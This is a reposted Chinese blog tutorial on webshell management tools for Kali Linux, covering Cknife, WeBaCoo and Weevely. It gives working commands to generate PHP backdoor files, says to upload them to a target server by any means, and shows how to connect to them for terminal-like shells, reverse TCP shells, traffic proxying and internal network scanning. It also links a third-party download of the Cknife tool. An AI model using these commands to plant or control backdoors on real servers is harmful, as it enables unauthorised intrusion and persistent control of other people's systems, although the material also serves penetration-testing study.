Kali下常见webshell管理工具汇总

转 自 https://www.ohlinge.cn/kali/kali_webshell.html

0x01 前言

Kali Linux作为一款专为渗透测试而生的Linux操作系统，在安全界的影响广泛。一般的webshell在Windows下面经常使用Chopper(中国菜刀)来管理，那么在Linux下面，有没有类似的工具来达到类似的效果呢？答案是肯定的。

0x02 跨平台版菜刀:Cknife

这款被业界成为C刀的工具是由Chora && MelodyZX两位作者联合开发的，目的是成为一个Java版跨平台“菜刀”。整体功能大致与菜刀类似(因为就是模仿菜刀来写的呀！)笔者认为，在Kali上使用还是可以的，毕竟Chopper不能。有人总要问，哪个更好一点？从我的角度看，菜刀毕竟原创，很多方面都很强大，如果是Windows，强烈建议找一款去后门的菜刀来用。当然，Kali下面，C刀还是能应急的。看看效果吧：

相关

Github:https://github.com/Chora10/Cknife
下载: http://pan.baidu.com/s/1nul1mpr 密码：f65g

0x03 一款小巧的PHP后门工具：WeBaCoo

全名：Web Backdoor Cookie
简介：Kali已经集成，产生类终端shell，编码通信内容通过HTTP头传输，隐蔽性较强。
优缺点：方便简单。适合作为临时shell，没有密码，只能用于php！
使用方法：
生成服务端程序

webacoo -g -o a.php

通过各种手段上传
客户端连接

webacoo -t -u http://1.1.1.1/a.php[/code] 
eg>通过Kali+Metaspolitable完成功能演示：









0x04 另一款强大的PHP后门：Weevely
具有隐蔽性的类终端PHP Webshell
30多个强大的管理模块
可用于执行系统命令、浏览文件系统
检查服务器常见配置错误
创建正向、反向TCP Shell链接
通过目标主机代理HTTP流量
从目标主机运行端口扫描，渗透内网

支持设置密码
#一个小插曲：Kali自带Weevely缺少PySockets库而不能正常运行，安装即可： https://pypi.python.org/pypi/PySocks/ ./setup.py install

功能演示：

生成服务端程序
~# weevely generate <password> b.php

~# cat /usr/share/weevely/b.php




各种上传



客户端连接
~# weevely http://1.1.1.1/b.php <password>




模块的使用：
$ help

$ [模块名]


例如，使用
:system_info
导出系统信息



0x05 后记
前面三种是笔者经常于Linux使用的工具，当然还有其他的可用。比如利用MSF下的Payload： PHP Meterpreter……

对于以上三种，推荐使用weevely，毕竟有强大的功能~

本文出自0h1in9e's Blog,转载请注明出处：https://www.ohlinge.cn